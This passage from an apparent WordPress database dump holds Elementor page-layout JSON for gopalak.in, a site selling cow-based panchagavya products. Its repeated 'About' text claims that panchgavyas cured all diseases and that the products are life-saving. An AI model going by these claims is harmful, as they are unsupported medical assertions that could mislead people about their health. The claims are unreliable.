ze\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"08fdbe7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bc55a55\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfae959\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11798,1958,'_elementor_page_assets','a:0:{}'),(11800,1959,'_elementor_edit_mode','builder'),(11801,1959,'_elementor_template_type','wp-page'),(11802,1959,'_elementor_version','3.7.8'),(11803,1959,'_wp_page_template','elementor_canvas'),(11804,1959,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"08fdbe7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bc55a55\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfae959\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11805,1959,'_elementor_page_assets','a:0:{}'),(11808,1960,'_elementor_edit_mode','builder'),(11809,1960,'_elementor_template_type','wp-page'),(11810,1960,'_elementor_version','3.7.8'),(11811,1960,'_wp_page_template','elementor_canvas'),(11812,1960,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\